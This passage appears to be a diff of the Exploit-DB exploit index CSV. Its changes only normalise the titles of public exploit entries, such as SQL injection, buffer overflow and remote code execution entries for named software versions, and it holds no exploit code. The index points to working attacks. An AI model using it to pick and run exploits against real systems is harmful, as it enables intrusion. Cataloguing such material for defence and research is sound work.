24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Vulnerability",2013-03-25,G0li47h,windows,dos,0 @@ -22078,7 +22072,7 @@ id,file,description,date,author,platform,type,port 24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,metasploit,linux,remote,0 -24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management Remote Execution",2013-04-08,metasploit,multiple,remote,0 +24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,metasploit,multiple,remote,0 27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability",2006-03-16,"Michal Zalewski",windows,dos,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 @@ -22244,7 +22238,7 @@ id,file,description,date,author,platform,type,port 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.php SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 -25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 +25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 - PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness",2005-02-14,Paul,windows,remote,0 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x Debug Remote Information Disclosure Vulnerability",2005-02-14,GHC,cgi,webapps,0 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 ndex.php language Parameter XSS",2005-02-14,"John Cobb",php,webapps,0 @@ -23544,7 +23538,7 @@ id,file,description,date,author,platform,type,port 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,metasploit,linux,remote,0 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload Vulnerability",2013-06-24,metasploit,php,remote,0 -26422,platforms/linux/remote/26422.rb,"MoinMoin twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0 +26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.php File Include Vulnerability",2005-10-26,"Andreas Sandblad",php,webapps,0 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution Vulnerability",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x Info-DB Info_db.php Multiple SQL Injection Vulnerabilities",2005-10-26,admin@batznet.com,php,webapps,0 @@ -23579,7 +23573,7 @@ id,file,description,date,author,platform,type,port 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB Index.php Cross-Site Scripting Vulnerability",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.php SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 -26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2005-11-01,ad@class101.org,windows,dos,0 +26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service Vulnerability (1)",2005-11-01,ad@class101.org,windows,dos,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 Index.php SQL Injection Vulnerability",2005-11-02,Mousehack,php,webapps,0 26459,platforms/php/webapps/26459.txt,"phpWebThings 0.4.4 Forum.php Cross-Site Scripting Vulnerability",2005-11-02,Linux_Drox,php,webapps,0 26460,platforms/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow Vulnerability",2005-11-02,"Luigi Auriemma",windows,remote,0 @@ -24397,8 +24391,8 @@ id,file,description,date,author,platform,type,port 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload Vulnerability",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 -27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 PASS Command - Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 -27528,platforms/hardware/remote/27528.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-12,metasploit,hardware,remote,0 +27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 +27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM <= 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 @@ -24422,7 +24416,7 @@ id,file,description,date,author,platform,type,port 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0 27301,platforms/php/webapps/27301.txt,"NOCC 1.0 no_mail.php html_no_mail Parameter XSS",2006-02-23,rgod,php,webapps,0 27302,platforms/php/webapps/27302.txt,"NOCC 1.0 html_bottom_table.php Multiple Parameter XSS",2006-02-23,rgod,php,webapps,0 -27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 Index.php SQL Injection Vulnerability",2006-02-23,h4cky0u,php,webapps,0 +27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 - Index.php SQL Injection Vulnerability",2006-02-23,h4cky0u,php,webapps,0 27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload Vulnerability",2006-02-23,"NSA Group",php,webapps,0 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 XCode Tag HTML Injection Vulnerability",2006-02-23,"Thomas Pollet",php,webapps,0 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 jgs_galerie_slideshow.php Multiple Parameter XSS",2006-02-23,nuker,php,webapps,0 @@ -24539,7 +24533,7 @@ id,file,description,date,author,platform,type,port 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.php Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0 -27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0 +27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,metasploit,hardware,remote,0 27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0 27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 @@ -24619,7 +24613,7 @@ id,file,description,date,author,platform,type,port 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 Index.php Cross-Site Scripting Vulnerability",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 -27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-08-12,LiquidWorm,php,webapps,80 +27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80 27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 BVF File Import Python Code Execution Vulnerability",2006-04-24,"Joxean Koret",cgi,webapps,0 @@ -24700,7 +24694,7 @@ id,file,description,date,author,platform,type,port 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection Vulnerability",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,metasploit,windows,remote,8000 -27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD Stack Buffer Overflow",2013-08-15,metasploit,windows,remote,80 +27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow",2013-08-15,metasploit,windows,remote,80 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,metasploit,windows,local,0 27610,platforms/php/remote/27610.rb,"Joomla Media Manager File Upload Vulnerability",2013-08-15,metasploit,php,remote,80 27611,platforms/windows/remote/27611.txt,"Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0 @@ -24751,7 +24745,7 @@ id,file,description,date,author,platform,type,port 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0 27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.php Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.php Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0 -27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,Hessam-x,php,webapps,0 +27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 Index.php Local File Include Vulnerability",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 Page Parameter Cross-Site Scripting Vulnerability",2006-04-17,ALMOKANN3,php,webapps,0 @@ -24806,7 +24800,7 @@ id,file,description,date,author,platform,type,port 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter XSS",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 index.php catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 -27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 STOR Command - Buffer Overflow Exploit",2013-08-19,Polunchis,windows,remote,0 +27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 - STOR Command Buffer Overflow Exploit",2013-08-19,Polunchis,windows,remote,0 27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing Vulnerability",2013-08-19,metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 @@ -25000,7 +24994,7 @@ id,file,description,date,author,platform,type,port 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String Vulnerability",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 -27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2006-05-26,"Thomas Waldegger",windows,dos,0 +27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service Vulnerability (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.php SQL Injection Vulnerability",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.php Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory Index.php Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 @@ -25244,7 +25238,7 @@ id,file,description,date,author,platform,type,port 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0 -28188,platforms/windows/remote/28188.rb,"HP SiteScope Remote Code Execution",2013-09-10,metasploit,windows,remote,8080 +28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability",2006-07-06,Nanika,windows,remote,0 28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include Vulnerability",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 @@ -25366,7 +25360,7 @@ id,file,description,date,author,platform,type,port 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 28314,platforms/linux/remote/28314.c,"bomberclone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.php Directory Traversal Vulnerability",2006-07-31,Dr.GooGle,php,webapps,0 -28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-31,SirDarckCat,php,webapps,0 +28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie Quick_Path Parameter Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script Index.php Remote File Include Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 @@ -25378,7 +25372,7 @@ id,file,description,date,author,platform,type,port 28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x war.php page Parameter XSS",2006-08-03,mfoxhacker,php,webapps,0 28327,platforms/php/webapps/28327.txt,"VWar 1.x war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 -28328,platforms/windows/remote/28328.rb,"PCMAN FTP 2.07 STOR Command - Stack Overflow Exploit (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 +28328,platforms/windows/remote/28328.rb,"PCMAN FTP 2.07 - STOR Command Stack Overflow Exploit (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 @@ -25524,7 +25518,7 @@ id,file,description,date,author,platform,type,port 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include Vulnerability",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 -28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2013-09-23,metasploit,windows,remote,6502 +28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (2)",2013-09-23,metasploit,windows,remote,6502 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,metasploit,windows,remote,0 28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80 @@ -25729,7 +25723,7 @@ id,file,description,date,author,platform,type,port 28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,metasploit,windows,remote,21 28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer SetMouseCapture Use-After-Free",2013-10-02,metasploit,windows,remote,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 - 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 -28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,80 +28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Include Vulnerability",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"php_news 2.0 user_user.php language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -25761,7 +25755,7 @@ id,file,description,date,author,platform,type,port 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.php3 - Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 -29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 +29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.php Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0 @@ -25934,7 +25928,7 @@ id,file,description,date,author,platform,type,port 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.php Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28901,platforms/php/webapps/28901.txt,"ac4p Mobile MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 -28902,platforms/php/webapps/28902.txt,"ac4p Mobile polls.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28902,platforms/php/webapps/28902.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (1)",2006-11-03,AL-garnei,php,webapps,0 28903,platforms/php/webapps/28903.txt,"ac4p Mobile send.php cats Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28904,platforms/php/webapps/28904.txt,"ac4p Mobile up.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28905,platforms/php/webapps/28905.txt,"ac4p Mobile cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 @@ -26243,7 +26237,7 @@ id,file,description,date,author,platform,type,port 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.php Cross-Site Scripting Vulnerability",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 Index.ASP SQL Injection Vulnerability",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile up.php Taaa Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 -29226,platforms/php/webapps/29226.txt,"ac4p Mobile polls.php Multiple Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 +29226,platforms/php/webapps/29226.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (2)",2006-12-04,SwEET-DeViL,php,webapps,0 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 vf_info.asp StrMes Parameter XSS",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 vf_newtopic.asp IFRAME Element XSS",2006-12-04,St@rExT,asp,webapps,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability",2006-12-05,"Juan Pablo Lopez",windows,dos,0 @@ -26550,7 +26544,7 @@ id,file,description,date,author,platform,type,port 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 (objectDetail.php objectId param) - SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 -29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-11-08,"Marcela Benetrix",php,webapps,80 +29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service Vulnerability",2007-01-24,"Lubomir Kundrak",linux,dos,0 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 Modules_Dir Remote File Include Vulnerability",2007-01-24,"Dr Max Virus",php,webapps,0 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service and Information Disclosure Vulnerability",2007-01-24,"Blake Matheny",php,webapps,0 @@ -26837,18 +26831,18 @@ id,file,description,date,author,platform,type,port 30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability",2007-05-31,"Gerhard Wagner",php,remote,0 -30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 param/param.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 - ident/disconnect.php path_inc Parameter Remote File 